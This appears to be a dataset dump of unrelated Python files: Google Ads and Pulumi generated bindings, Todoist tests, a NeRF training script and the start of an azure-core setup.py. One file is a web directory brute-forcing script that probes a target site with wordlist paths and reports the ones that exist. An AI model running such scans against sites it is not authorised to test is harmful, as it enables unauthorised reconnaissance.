Dataset schema (each record below lists these columns in this order; the source file itself is in the `content` column):

| column | dtype | range |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 4 to 1.02M |
| ext | string | 8 classes |
| lang | string | 1 class |
| max_stars_repo_path | string | length 4 to 209 |
| max_stars_repo_name | string | length 5 to 121 |
| max_stars_repo_head_hexsha | string | length 40 |
| max_stars_repo_licenses | list | length 1 to 10 |
| max_stars_count | int64 | 1 to 191k, nullable |
| max_stars_repo_stars_event_min_datetime | string | length 24, nullable |
| max_stars_repo_stars_event_max_datetime | string | length 24, nullable |
| max_issues_repo_path | string | length 4 to 209 |
| max_issues_repo_name | string | length 5 to 121 |
| max_issues_repo_head_hexsha | string | length 40 |
| max_issues_repo_licenses | list | length 1 to 10 |
| max_issues_count | int64 | 1 to 67k, nullable |
| max_issues_repo_issues_event_min_datetime | string | length 24, nullable |
| max_issues_repo_issues_event_max_datetime | string | length 24, nullable |
| max_forks_repo_path | string | length 4 to 209 |
| max_forks_repo_name | string | length 5 to 121 |
| max_forks_repo_head_hexsha | string | length 40 |
| max_forks_repo_licenses | list | length 1 to 10 |
| max_forks_count | int64 | 1 to 105k, nullable |
| max_forks_repo_forks_event_min_datetime | string | length 24, nullable |
| max_forks_repo_forks_event_max_datetime | string | length 24, nullable |
| content | string | length 4 to 1.02M |
| avg_line_length | float64 | 1.07 to 66.1k |
| max_line_length | int64 | 4 to 266k |
| alphanum_fraction | float64 | 0.01 to 1 |
bb7c04ae2fc3b615c29c541ca3d198bb728ce9a1
| 2,868
|
py
|
Python
|
google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/resources/types/customer_user_access_invitation.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 7
|
2021-02-21T10:39:41.000Z
|
2021-12-07T07:31:28.000Z
|
google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/resources/types/customer_user_access_invitation.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 6
|
2021-02-02T23:46:11.000Z
|
2021-11-15T01:46:02.000Z
|
google/ads/googleads/v7/googleads-py/google/ads/googleads/v7/resources/types/customer_user_access_invitation.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 4
|
2021-01-28T23:25:45.000Z
|
2021-08-30T01:55:16.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.ads.googleads.v7.enums.types import access_invitation_status
from google.ads.googleads.v7.enums.types import access_role as gage_access_role
__protobuf__ = proto.module(
package='google.ads.googleads.v7.resources',
marshal='google.ads.googleads.v7',
manifest={
'CustomerUserAccessInvitation',
},
)
class CustomerUserAccessInvitation(proto.Message):
r"""Represent an invitation to a new user on this customer
account.
Attributes:
resource_name (str):
Immutable. Name of the resource. Resource names have the
form:
``customers/{customer_id}/customerUserAccessInvitations/{invitation_id}``
invitation_id (int):
Output only. The ID of the invitation.
This field is read-only.
access_role (google.ads.googleads.v7.enums.types.AccessRoleEnum.AccessRole):
Immutable. Access role of the user.
email_address (str):
Immutable. Email address the invitation was
sent to. This can differ from the email address
of the account that accepts the invite.
creation_date_time (str):
Output only. Time invitation was created.
This field is read-only.
The format is "YYYY-MM-DD HH:MM:SS".
Examples: "2018-03-05 09:15:00" or "2018-02-01
14:34:30".
invitation_status (google.ads.googleads.v7.enums.types.AccessInvitationStatusEnum.AccessInvitationStatus):
Output only. Invitation status of the user.
"""
resource_name = proto.Field(
proto.STRING,
number=1,
)
invitation_id = proto.Field(
proto.INT64,
number=2,
)
access_role = proto.Field(
proto.ENUM,
number=3,
enum=gage_access_role.AccessRoleEnum.AccessRole,
)
email_address = proto.Field(
proto.STRING,
number=4,
)
creation_date_time = proto.Field(
proto.STRING,
number=5,
)
invitation_status = proto.Field(
proto.ENUM,
number=6,
enum=access_invitation_status.AccessInvitationStatusEnum.AccessInvitationStatus,
)
__all__ = tuple(sorted(__protobuf__.manifest))
| 32.590909
| 114
| 0.667364
|
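A minimal usage sketch for the generated proto-plus message above, assuming the google-ads v7 Python surface is installed; the field values and the ADMIN enum member are illustrative assumptions, not taken from this file.

# Hypothetical usage of the proto-plus message defined above.
# Assumes the google-ads v7 surface is installed; the values and the ADMIN
# enum member are illustrative assumptions.
from google.ads.googleads.v7.resources.types.customer_user_access_invitation import (
    CustomerUserAccessInvitation,
)
from google.ads.googleads.v7.enums.types import access_role

invitation = CustomerUserAccessInvitation(
    email_address="user@example.com",
    access_role=access_role.AccessRoleEnum.AccessRole.ADMIN,
)
print(invitation.email_address)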
4ba49027a7617d6b4fbc25d3f36287d7f9952deb
| 3,074
|
py
|
Python
|
app.py
|
codernayeem/web-directories-discoverer
|
7513a59fbe33f4e0a377e2d37f67ae7d0ce4c308
|
[
"MIT"
] | 1
|
2020-07-10T08:44:14.000Z
|
2020-07-10T08:44:14.000Z
|
app.py
|
codernayeem/web-directories-discoverer
|
7513a59fbe33f4e0a377e2d37f67ae7d0ce4c308
|
[
"MIT"
] | null | null | null |
app.py
|
codernayeem/web-directories-discoverer
|
7513a59fbe33f4e0a377e2d37f67ae7d0ce4c308
|
[
"MIT"
] | null | null | null |
import requests
from os.path import join
file_type_dict = {
'1': 'dir_',
'2': 'file_',
'3': 'file_php_',
'4': '(dir-file) '
}
word_type_dict = {
'1': 'all',
'2': 'common',
'3': 'crazy',
'4': 'extra'
}
def get_ans(qs):
while True:
ans = input(qs)
if ans.lower() == 'y':
return True
elif ans.lower() == 'n':
return False
def request(url):
try:
r = requests.get(url)
if r.status_code == 404:
return False
else:
return r.status_code
except Exception as e:
        print('\n[!] - Oops. Got an error.\n')
print(e, '\n')
return None
if __name__ == '__main__':
print('')
print('\t++++++++++++++++++++++++++++++++++++')
print('\t||| Web Directories Discoverer |||')
print('\t||| By @codernayeem |||')
print('\t====================================')
while True:
count = 0
save = ''
print('\n[+] - Enter Target link')
target = input('[?] --> ')
if target == '':
continue
if not (target.startswith('http://') or target.startswith('https://')):
target = 'http://' + target
if not target.endswith('/'):
target += '/'
        print('\n---> Let\'s use the built-in dictionaries!')
while True:
print('\n--> Choose dictionary type? ')
print(' 1. Only Directory')
print(' 2. Only Files')
print(' 3. Only Files (PHP)')
print(' 4. Directory & Files')
ans = input('[>] ')
if ans in ['1', '2', '3', '4']:
file_type = ans
break
while True:
print('\n--> Choose words type? ')
print(' 1. All')
print(' 2. Common')
print(' 3. Crazy')
print(' 4. Extra')
ans = input('[>] ')
if ans in ['1', '2', '3', '4']:
word_type = ans
break
file_path = join('wordlist', file_type_dict[file_type] + word_type_dict[word_type] + '.wordlist')
try:
fl = open(file_path, 'r')
except:
print(f'[+] - Failed to open "{file_path}". Make sure that file exists.\n')
continue
directory_list = fl.read().strip().splitlines()
fl.close()
print('[+] - Searching started ...\n')
for a_item in directory_list:
a_item = a_item.strip()
if a_item != '':
link = target + a_item
response = request(link)
if response is None:
                    print('[+] - Got an error, so we stopped.')
break
elif response:
print(f'\n[+] - Got at - {link} - [{response}]')
count += 1
print(f'\n[!] - All done ({count})')
if not get_ans('\n[?] - Wanna try again? '):
exit(0)
| 27.945455
| 105
| 0.420299
|
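As a side note on the script above, the two lookup dicts compose directly into the wordlist path; a tiny standalone sketch follows, where the menu choices "1" and "2" are example inputs.

# Standalone illustration of how the script above builds its wordlist path;
# the menu choices '1' (Only Directory) and '2' (Common) are example inputs.
from os.path import join
file_type_dict = {'1': 'dir_', '2': 'file_', '3': 'file_php_', '4': '(dir-file) '}
word_type_dict = {'1': 'all', '2': 'common', '3': 'crazy', '4': 'extra'}
print(join('wordlist', file_type_dict['1'] + word_type_dict['2'] + '.wordlist'))
# -> wordlist/dir_common.wordlist (on POSIX paths)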
8066c88d80723199425abc63c47807e5ee992971
| 561
|
py
|
Python
|
tests/test_priority.py
|
StefanBRas/todoist-taskwarrior
|
08dc877452d621a7c1ec3ed13de06d4c1fedb266
|
[
"MIT"
] | null | null | null |
tests/test_priority.py
|
StefanBRas/todoist-taskwarrior
|
08dc877452d621a7c1ec3ed13de06d4c1fedb266
|
[
"MIT"
] | 1
|
2021-03-11T04:56:02.000Z
|
2021-03-11T21:42:33.000Z
|
tests/test_priority.py
|
StefanBRas/todoist-taskwarrior
|
08dc877452d621a7c1ec3ed13de06d4c1fedb266
|
[
"MIT"
] | null | null | null |
""" Priority Tests
Test conversions between Todoist and Taskwarrior priorities.
"""
import pytest
from todoist_taskwarrior import utils
def test_priorities():
    assert utils.ti_priority_to_tw(1) is None
assert utils.ti_priority_to_tw(2) == 'L'
assert utils.ti_priority_to_tw(3) == 'M'
assert utils.ti_priority_to_tw(4) == 'H'
def test_priorities_str():
    assert utils.ti_priority_to_tw('1') is None
assert utils.ti_priority_to_tw('2') == 'L'
assert utils.ti_priority_to_tw('3') == 'M'
assert utils.ti_priority_to_tw('4') == 'H'
| 26.714286
| 60
| 0.709447
|
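The tests above pin down the Todoist-to-Taskwarrior priority mapping (1 -> None, 2 -> 'L', 3 -> 'M', 4 -> 'H'); a minimal implementation that would satisfy them is sketched below. The real todoist_taskwarrior.utils module may be written differently.

# Hypothetical implementation consistent with the tests above; the actual
# todoist_taskwarrior.utils.ti_priority_to_tw may differ.
_PRIORITY_MAP = {1: None, 2: 'L', 3: 'M', 4: 'H'}

def ti_priority_to_tw(priority):
    # The tests exercise both int and str inputs, so normalise first.
    return _PRIORITY_MAP[int(priority)]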
4b1951d9df2bda9a58b71890e7633aae9b44c161
| 6,676
|
py
|
Python
|
train.py
|
ycheng42/nerf_pl
|
a9e66a851907069f22423ca6ea4581e1657f9572
|
[
"MIT"
] | null | null | null |
train.py
|
ycheng42/nerf_pl
|
a9e66a851907069f22423ca6ea4581e1657f9572
|
[
"MIT"
] | null | null | null |
train.py
|
ycheng42/nerf_pl
|
a9e66a851907069f22423ca6ea4581e1657f9572
|
[
"MIT"
] | null | null | null |
import os, sys
from opt import get_opts
import torch
from collections import defaultdict
from torch.utils.data import DataLoader
from datasets import dataset_dict
# models
from models.nerf import Embedding, NeRF
from models.rendering import render_rays
# optimizer, scheduler, visualization
from utils import *
# losses
from losses import loss_dict
# metrics
from metrics import *
# pytorch-lightning
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning import LightningModule, Trainer
from pytorch_lightning.logging import TestTubeLogger
class NeRFSystem(LightningModule):
def __init__(self, hparams):
super(NeRFSystem, self).__init__()
self.hparams = hparams
self.loss = loss_dict[hparams.loss_type]()
self.embedding_xyz = Embedding(3, 10) # 10 is the default number
self.embedding_dir = Embedding(3, 4) # 4 is the default number
self.embeddings = [self.embedding_xyz, self.embedding_dir]
self.nerf_coarse = NeRF()
self.models = [self.nerf_coarse]
if hparams.N_importance > 0:
self.nerf_fine = NeRF()
self.models += [self.nerf_fine]
def decode_batch(self, batch):
rays = batch['rays'] # (B, 8)
rgbs = batch['rgbs'] # (B, 3)
return rays, rgbs
def forward(self, rays):
"""Do batched inference on rays using chunk."""
B = rays.shape[0]
results = defaultdict(list)
for i in range(0, B, self.hparams.chunk):
rendered_ray_chunks = \
render_rays(self.models,
self.embeddings,
rays[i:i+self.hparams.chunk],
self.hparams.N_samples,
self.hparams.use_disp,
self.hparams.perturb,
self.hparams.noise_std,
self.hparams.N_importance,
self.hparams.chunk, # chunk size is effective in val mode
self.train_dataset.white_back)
for k, v in rendered_ray_chunks.items():
results[k] += [v]
for k, v in results.items():
results[k] = torch.cat(v, 0)
return results
def prepare_data(self):
dataset = dataset_dict[self.hparams.dataset_name]
kwargs = {'root_dir': self.hparams.root_dir,
'img_wh': tuple(self.hparams.img_wh)}
if self.hparams.dataset_name == 'llff':
kwargs['spheric_poses'] = self.hparams.spheric_poses
kwargs['val_num'] = self.hparams.num_gpus
self.train_dataset = dataset(split='train', **kwargs)
self.val_dataset = dataset(split='val', **kwargs)
def configure_optimizers(self):
self.optimizer = get_optimizer(self.hparams, self.models)
scheduler = get_scheduler(self.hparams, self.optimizer)
return [self.optimizer], [scheduler]
def train_dataloader(self):
return DataLoader(self.train_dataset,
shuffle=True,
num_workers=4,
batch_size=self.hparams.batch_size,
pin_memory=True)
def val_dataloader(self):
return DataLoader(self.val_dataset,
shuffle=False,
num_workers=4,
batch_size=1, # validate one image (H*W rays) at a time
pin_memory=True)
def training_step(self, batch, batch_nb):
log = {'lr': get_learning_rate(self.optimizer)}
rays, rgbs = self.decode_batch(batch)
results = self(rays)
log['train/loss'] = loss = self.loss(results, rgbs)
typ = 'fine' if 'rgb_fine' in results else 'coarse'
with torch.no_grad():
psnr_ = psnr(results[f'rgb_{typ}'], rgbs)
log['train/psnr'] = psnr_
return {'loss': loss,
'progress_bar': {'train_psnr': psnr_},
'log': log
}
def validation_step(self, batch, batch_nb):
rays, rgbs = self.decode_batch(batch)
rays = rays.squeeze() # (H*W, 3)
rgbs = rgbs.squeeze() # (H*W, 3)
results = self(rays)
log = {'val_loss': self.loss(results, rgbs)}
typ = 'fine' if 'rgb_fine' in results else 'coarse'
if batch_nb == 0:
W, H = self.hparams.img_wh
img = results[f'rgb_{typ}'].view(H, W, 3).cpu()
img = img.permute(2, 0, 1) # (3, H, W)
img_gt = rgbs.view(H, W, 3).permute(2, 0, 1).cpu() # (3, H, W)
depth = visualize_depth(results[f'depth_{typ}'].view(H, W)) # (3, H, W)
stack = torch.stack([img_gt, img, depth]) # (3, 3, H, W)
self.logger.experiment.add_images('val/GT_pred_depth',
stack, self.global_step)
log['val_psnr'] = psnr(results[f'rgb_{typ}'], rgbs)
return log
def validation_epoch_end(self, outputs):
mean_loss = torch.stack([x['val_loss'] for x in outputs]).mean()
mean_psnr = torch.stack([x['val_psnr'] for x in outputs]).mean()
return {'progress_bar': {'val_loss': mean_loss,
'val_psnr': mean_psnr},
'log': {'val/loss': mean_loss,
'val/psnr': mean_psnr}
}
if __name__ == '__main__':
hparams = get_opts()
system = NeRFSystem(hparams)
checkpoint_callback = ModelCheckpoint(filepath=os.path.join(f'ckpts/{hparams.exp_name}',
'{epoch:d}'),
monitor='val/loss',
mode='min',
save_top_k=5,)
logger = TestTubeLogger(
save_dir="logs",
name=hparams.exp_name,
debug=False,
create_git_tag=False
)
trainer = Trainer(max_epochs=hparams.num_epochs,
checkpoint_callback=checkpoint_callback,
resume_from_checkpoint=hparams.ckpt_path,
logger=logger,
early_stop_callback=None,
weights_summary=None,
progress_bar_refresh_rate=1,
gpus=hparams.num_gpus,
distributed_backend='ddp' if hparams.num_gpus>1 else None,
num_sanity_val_steps=1,
benchmark=True,
profiler=hparams.num_gpus==1)
trainer.fit(system)
| 36.480874
| 92
| 0.546585
|
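NeRFSystem.forward above renders rays in fixed-size chunks and concatenates the per-key outputs; the pattern in isolation looks like this self-contained sketch, where render_chunk is a dummy stand-in for render_rays.

# Self-contained sketch of the chunked-inference pattern used in NeRFSystem.forward.
# render_chunk is a dummy stand-in for render_rays; shapes follow decode_batch.
from collections import defaultdict
import torch

def render_chunk(rays):
    return {'rgb_coarse': torch.zeros(rays.shape[0], 3)}

rays = torch.randn(10000, 8)          # (B, 8)
chunk = 4096
results = defaultdict(list)
for i in range(0, rays.shape[0], chunk):
    for k, v in render_chunk(rays[i:i + chunk]).items():
        results[k] += [v]
results = {k: torch.cat(v, 0) for k, v in results.items()}
print(results['rgb_coarse'].shape)    # torch.Size([10000, 3])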
e9ce08531942bd2a91b23ef305616808f5160fa7
| 17,821
|
py
|
Python
|
sdk/python/pulumi_aws/appmesh/virtual_node.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/appmesh/virtual_node.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/appmesh/virtual_node.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class VirtualNode(pulumi.CustomResource):
arn: pulumi.Output[str]
"""
The ARN of the virtual node.
"""
created_date: pulumi.Output[str]
"""
The creation date of the virtual node.
"""
last_updated_date: pulumi.Output[str]
"""
The last update date of the virtual node.
"""
mesh_name: pulumi.Output[str]
"""
The name of the service mesh in which to create the virtual node.
"""
name: pulumi.Output[str]
"""
The name to use for the virtual node.
"""
spec: pulumi.Output[dict]
"""
The virtual node specification to apply.
* `backends` (`list`) - The backends to which the virtual node is expected to send outbound traffic.
* `virtualService` (`dict`) - Specifies a virtual service to use as a backend for a virtual node.
* `virtualServiceName` (`str`) - The name of the virtual service that is acting as a virtual node backend.
* `listener` (`dict`) - The listeners from which the virtual node is expected to receive inbound traffic.
* `health_check` (`dict`) - The health check information for the listener.
* `healthyThreshold` (`float`) - The number of consecutive successful health checks that must occur before declaring listener healthy.
* `interval_millis`- (Required) The time period in milliseconds between each health check execution.
* `intervalMillis` (`float`)
* `path` (`str`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `port` (`float`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`str`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `timeoutMillis` (`float`) - The amount of time to wait when receiving a response from the health check, in milliseconds.
* `unhealthyThreshold` (`float`) - The number of consecutive failed health checks that must occur before declaring a virtual node unhealthy.
* `portMapping` (`dict`) - The port mapping information for the listener.
* `port` (`float`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`str`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `logging` (`dict`) - The inbound and outbound access logging information for the virtual node.
* `accessLog` (`dict`) - The access log configuration for a virtual node.
* `file` (`dict`) - The file object to send virtual node access logs to.
* `path` (`str`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `serviceDiscovery` (`dict`) - The service discovery information for the virtual node.
* `awsCloudMap` (`dict`) - Specifies any AWS Cloud Map information for the virtual node.
* `attributes` (`dict`) - A string map that contains attributes with values that you can use to filter instances by any custom attribute that you specified when you registered the instance. Only instances that match all of the specified key/value pairs will be returned.
* `namespaceName` (`str`) - The name of the AWS Cloud Map namespace to use.
Use the [`servicediscovery.HttpNamespace`](https://www.terraform.io/docs/providers/aws/r/service_discovery_http_namespace.html) resource to configure a Cloud Map namespace.
* `serviceName` (`str`) - The name of the AWS Cloud Map service to use. Use the [`servicediscovery.Service`](https://www.terraform.io/docs/providers/aws/r/service_discovery_service.html) resource to configure a Cloud Map service.
* `dns` (`dict`) - Specifies the DNS service name for the virtual node.
* `hostname` (`str`) - The DNS host name for your virtual node.
"""
tags: pulumi.Output[dict]
"""
A mapping of tags to assign to the resource.
"""
def __init__(__self__, resource_name, opts=None, mesh_name=None, name=None, spec=None, tags=None, __props__=None, __name__=None, __opts__=None):
"""
Provides an AWS App Mesh virtual node resource.
## Breaking Changes
Because of backward incompatible API changes (read [here](https://github.com/awslabs/aws-app-mesh-examples/issues/92)), `appmesh.VirtualNode` resource definitions created with provider versions earlier than v2.3.0 will need to be modified:
* Rename the `service_name` attribute of the `dns` object to `hostname`.
* Replace the `backends` attribute of the `spec` object with one or more `backend` configuration blocks,
setting `virtual_service_name` to the name of the service.
The state associated with existing resources will automatically be migrated.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] mesh_name: The name of the service mesh in which to create the virtual node.
:param pulumi.Input[str] name: The name to use for the virtual node.
:param pulumi.Input[dict] spec: The virtual node specification to apply.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **spec** object supports the following:
* `backends` (`pulumi.Input[list]`) - The backends to which the virtual node is expected to send outbound traffic.
* `virtualService` (`pulumi.Input[dict]`) - Specifies a virtual service to use as a backend for a virtual node.
* `virtualServiceName` (`pulumi.Input[str]`) - The name of the virtual service that is acting as a virtual node backend.
* `listener` (`pulumi.Input[dict]`) - The listeners from which the virtual node is expected to receive inbound traffic.
* `health_check` (`pulumi.Input[dict]`) - The health check information for the listener.
* `healthyThreshold` (`pulumi.Input[float]`) - The number of consecutive successful health checks that must occur before declaring listener healthy.
* `interval_millis`- (Required) The time period in milliseconds between each health check execution.
* `intervalMillis` (`pulumi.Input[float]`)
* `path` (`pulumi.Input[str]`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `port` (`pulumi.Input[float]`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`pulumi.Input[str]`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `timeoutMillis` (`pulumi.Input[float]`) - The amount of time to wait when receiving a response from the health check, in milliseconds.
* `unhealthyThreshold` (`pulumi.Input[float]`) - The number of consecutive failed health checks that must occur before declaring a virtual node unhealthy.
* `portMapping` (`pulumi.Input[dict]`) - The port mapping information for the listener.
* `port` (`pulumi.Input[float]`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`pulumi.Input[str]`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `logging` (`pulumi.Input[dict]`) - The inbound and outbound access logging information for the virtual node.
* `accessLog` (`pulumi.Input[dict]`) - The access log configuration for a virtual node.
* `file` (`pulumi.Input[dict]`) - The file object to send virtual node access logs to.
* `path` (`pulumi.Input[str]`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `serviceDiscovery` (`pulumi.Input[dict]`) - The service discovery information for the virtual node.
* `awsCloudMap` (`pulumi.Input[dict]`) - Specifies any AWS Cloud Map information for the virtual node.
* `attributes` (`pulumi.Input[dict]`) - A string map that contains attributes with values that you can use to filter instances by any custom attribute that you specified when you registered the instance. Only instances that match all of the specified key/value pairs will be returned.
* `namespaceName` (`pulumi.Input[str]`) - The name of the AWS Cloud Map namespace to use.
Use the [`servicediscovery.HttpNamespace`](https://www.terraform.io/docs/providers/aws/r/service_discovery_http_namespace.html) resource to configure a Cloud Map namespace.
* `serviceName` (`pulumi.Input[str]`) - The name of the AWS Cloud Map service to use. Use the [`servicediscovery.Service`](https://www.terraform.io/docs/providers/aws/r/service_discovery_service.html) resource to configure a Cloud Map service.
* `dns` (`pulumi.Input[dict]`) - Specifies the DNS service name for the virtual node.
* `hostname` (`pulumi.Input[str]`) - The DNS host name for your virtual node.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/appmesh_virtual_node.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if mesh_name is None:
raise TypeError("Missing required property 'mesh_name'")
__props__['mesh_name'] = mesh_name
__props__['name'] = name
if spec is None:
raise TypeError("Missing required property 'spec'")
__props__['spec'] = spec
__props__['tags'] = tags
__props__['arn'] = None
__props__['created_date'] = None
__props__['last_updated_date'] = None
super(VirtualNode, __self__).__init__(
'aws:appmesh/virtualNode:VirtualNode',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, arn=None, created_date=None, last_updated_date=None, mesh_name=None, name=None, spec=None, tags=None):
"""
Get an existing VirtualNode resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] arn: The ARN of the virtual node.
:param pulumi.Input[str] created_date: The creation date of the virtual node.
:param pulumi.Input[str] last_updated_date: The last update date of the virtual node.
:param pulumi.Input[str] mesh_name: The name of the service mesh in which to create the virtual node.
:param pulumi.Input[str] name: The name to use for the virtual node.
:param pulumi.Input[dict] spec: The virtual node specification to apply.
:param pulumi.Input[dict] tags: A mapping of tags to assign to the resource.
The **spec** object supports the following:
* `backends` (`pulumi.Input[list]`) - The backends to which the virtual node is expected to send outbound traffic.
* `virtualService` (`pulumi.Input[dict]`) - Specifies a virtual service to use as a backend for a virtual node.
* `virtualServiceName` (`pulumi.Input[str]`) - The name of the virtual service that is acting as a virtual node backend.
* `listener` (`pulumi.Input[dict]`) - The listeners from which the virtual node is expected to receive inbound traffic.
* `health_check` (`pulumi.Input[dict]`) - The health check information for the listener.
* `healthyThreshold` (`pulumi.Input[float]`) - The number of consecutive successful health checks that must occur before declaring listener healthy.
* `interval_millis`- (Required) The time period in milliseconds between each health check execution.
* `intervalMillis` (`pulumi.Input[float]`)
* `path` (`pulumi.Input[str]`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `port` (`pulumi.Input[float]`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`pulumi.Input[str]`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `timeoutMillis` (`pulumi.Input[float]`) - The amount of time to wait when receiving a response from the health check, in milliseconds.
* `unhealthyThreshold` (`pulumi.Input[float]`) - The number of consecutive failed health checks that must occur before declaring a virtual node unhealthy.
* `portMapping` (`pulumi.Input[dict]`) - The port mapping information for the listener.
* `port` (`pulumi.Input[float]`) - The destination port for the health check request. This port must match the port defined in the `port_mapping` for the listener.
* `protocol` (`pulumi.Input[str]`) - The protocol for the health check request. Valid values are `http` and `tcp`.
* `logging` (`pulumi.Input[dict]`) - The inbound and outbound access logging information for the virtual node.
* `accessLog` (`pulumi.Input[dict]`) - The access log configuration for a virtual node.
* `file` (`pulumi.Input[dict]`) - The file object to send virtual node access logs to.
* `path` (`pulumi.Input[str]`) - The destination path for the health check request. This is only required if the specified protocol is `http`.
* `serviceDiscovery` (`pulumi.Input[dict]`) - The service discovery information for the virtual node.
* `awsCloudMap` (`pulumi.Input[dict]`) - Specifies any AWS Cloud Map information for the virtual node.
* `attributes` (`pulumi.Input[dict]`) - A string map that contains attributes with values that you can use to filter instances by any custom attribute that you specified when you registered the instance. Only instances that match all of the specified key/value pairs will be returned.
* `namespaceName` (`pulumi.Input[str]`) - The name of the AWS Cloud Map namespace to use.
Use the [`servicediscovery.HttpNamespace`](https://www.terraform.io/docs/providers/aws/r/service_discovery_http_namespace.html) resource to configure a Cloud Map namespace.
* `serviceName` (`pulumi.Input[str]`) - The name of the AWS Cloud Map service to use. Use the [`servicediscovery.Service`](https://www.terraform.io/docs/providers/aws/r/service_discovery_service.html) resource to configure a Cloud Map service.
* `dns` (`pulumi.Input[dict]`) - Specifies the DNS service name for the virtual node.
* `hostname` (`pulumi.Input[str]`) - The DNS host name for your virtual node.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/appmesh_virtual_node.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["arn"] = arn
__props__["created_date"] = created_date
__props__["last_updated_date"] = last_updated_date
__props__["mesh_name"] = mesh_name
__props__["name"] = name
__props__["spec"] = spec
__props__["tags"] = tags
return VirtualNode(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 65.040146
| 298
| 0.663319
|
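A hedged sketch of declaring the resource documented above with the dict-shaped spec this generated SDK accepts; the mesh name, service names, port and hostname are placeholders, not values taken from the docs.

# Illustrative Pulumi program using the dict-shaped `spec` documented above.
# Mesh name, service names, port and hostname are placeholder assumptions.
import pulumi_aws as aws

serviceb1 = aws.appmesh.VirtualNode(
    "serviceb1",
    mesh_name="simpleapp",
    spec={
        "backends": [
            {"virtualService": {"virtualServiceName": "servicea.simpleapp.local"}},
        ],
        "listener": {
            "portMapping": {"port": 8080, "protocol": "http"},
        },
        "serviceDiscovery": {
            "dns": {"hostname": "serviceb.simpleapp.local"},
        },
    },
)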
f684aeb34dd6cf55e4aa35a12a26645851d03c3d
| 2,631
|
py
|
Python
|
sdk/core/azure-core/setup.py
|
cicovica/azure-sdk-for-python
|
cd8bed878f8a11d081358bf67400fb01031582b6
|
[
"MIT"
] | null | null | null |
sdk/core/azure-core/setup.py
|
cicovica/azure-sdk-for-python
|
cd8bed878f8a11d081358bf67400fb01031582b6
|
[
"MIT"
] | null | null | null |
sdk/core/azure-core/setup.py
|
cicovica/azure-sdk-for-python
|
cd8bed878f8a11d081358bf67400fb01031582b6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import re
import os.path
from io import open
from setuptools import find_packages, setup # type: ignore
# Change the PACKAGE_NAME only to change folder and different name
